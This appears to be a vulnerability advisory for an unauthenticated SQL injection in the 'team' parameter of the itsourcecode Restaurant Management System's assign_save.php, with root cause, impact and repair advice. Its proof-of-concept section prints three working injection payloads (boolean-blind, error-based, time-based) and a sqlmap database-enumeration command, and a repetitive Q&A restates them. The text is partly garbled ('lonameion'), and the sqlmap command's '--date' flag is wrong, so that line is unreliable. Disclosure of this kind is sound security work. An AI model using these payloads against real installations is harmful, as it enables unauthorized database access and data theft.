Itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL Injection

by ADMIN 91 views

itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection

Introduction

The itsourcecode Restaurant Management System V1.0 has been found to contain a critical SQL injection vulnerability in the '/admin/assign_save.php?id=111' file. This vulnerability allows attackers to inject malicious SQL queries, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information. In this article, we will delve into the details of this vulnerability, its impact, and provide suggested repairs to ensure system security and protect data integrity.

Affected Product(s)

The affected product is the Restaurant Management System System, a PHP-based project available for download on the itsourcecode website.

Vendor Homepage

The vendor's homepage can be found at https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/.

Affected and/or Fixed Version(s)

The affected version is V1.0 of the Restaurant Management System System.

Submitter

The submitter of this vulnerability report is 0x0A1lphi.

Vulnerable File

The vulnerable file is /admin/assign_save.php?id=111.

Software Link

The software link for the affected product is https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip.

Problem Type

The problem type is a SQL injection vulnerability.

Root Cause

The root cause of this issue is that attackers inject malicious code from the parameter 'team' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

The impact of this SQL injection vulnerability is severe, as attackers can exploit it to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption. This poses a serious threat to system security and business continuity.

Description

During the security review of the Restaurant Management System System, a critical SQL injection vulnerability was discovered in the "/admin/assign_save.php?id=111" file. This vulnerability stems from insufficient user input validation of the 'team' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

This vulnerability can be exploited without requiring any login or authorization, making it a significant security risk.

Vulnerability details and POC

The vulnerability details and proof of concept (POC) are as follows:

  • Vulnerability lonameion: The 'team' parameter is vulnerable to SQL injection attacks.
  • Payload: The following payloads can be used to exploit this vulnerability:
Parameter: team (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: team=1' RLIKE (SELECT (CASE WHEN (2832=2832) THEN 1 ELSE 0x28 END))-- wGbK

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: team=1' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT (ELT(2346=2346,1))),0x71706a7871),2346)-- WACP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: team=1' AND (SELECT 9748 FROM (SELECT(SLEEP(5)))hGuU)-- kVEM

Screenshots of specific information obtained from testing and running with the sqlmap tool

The following screenshots show some specific information obtained from testing and running with the sqlmap tool:

    sqlmap -u "http://10.20.33.25/altonsystem/admin/assign_save.php?id=111" --date="team=1" --dbs

Image

Suggested repair

To repair this vulnerability, the following steps can be taken:

  1. Use prepared statements and parameter binding: Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
  2. Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

By following these steps, the vulnerability can be remediated, and the system can be made more secure.
itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection Q&A

Q: What is the itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection vulnerability?

A: The itsourcecode Restaurant Management System V1.0 /admin/assign_save.php?id=111 SQL injection vulnerability is a critical security flaw that allows attackers to inject malicious SQL queries, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information.

Q: What is the root cause of this vulnerability?

A: The root cause of this vulnerability is that attackers inject malicious code from the parameter 'team' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Q: What is the impact of this vulnerability?

A: The impact of this SQL injection vulnerability is severe, as attackers can exploit it to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption. This poses a serious threat to system security and business continuity.

Q: Is a login or authorization required to exploit this vulnerability?

A: No, a login or authorization is not required to exploit this vulnerability, making it a significant security risk.

Q: What are the vulnerable files and software links?

A: The vulnerable file is /admin/assign_save.php?id=111, and the software link for the affected product is https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip.

Q: What are the suggested repairs for this vulnerability?

A: The suggested repairs for this vulnerability are:

  1. Use prepared statements and parameter binding: Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
  2. Input validation and filtering: Strictly validate and filter user input data to ensure it conforms to the expected format.
  3. Minimize database user permissions: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
  4. Regular security audits: Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Q: What are the payload types and payloads for this vulnerability?

A: The payload types and payloads for this vulnerability are:

  • Boolean-based blind: team=1' RLIKE (SELECT (CASE WHEN (2832=2832) THEN 1 ELSE 0x28 END))-- wGbK
  • Error-based: team=1' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT (ELT(2346=2346,1))),0x71706a7871),2346)-- WACP
  • Time-based blind: team=1' AND (SELECT 9748 FROM (SELECT(SLEEP(5)))hGuU)-- kVEM

Q: What are the screenshots of specific information obtained from testing and running with the sqlmap tool?

A: The screenshots of specific information obtained from testing and running with the sqlmap tool are:

    sqlmap -u "http://10.20.33.25/altonsystem/admin/assign_save.php?id=111" --date="team=1" --dbs

Image

Q: Who is the submitter of this vulnerability report?

A: The submitter of this vulnerability report is 0x0A1lphi.

Q: What is the vendor's homepage?

A: The vendor's homepage is https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/.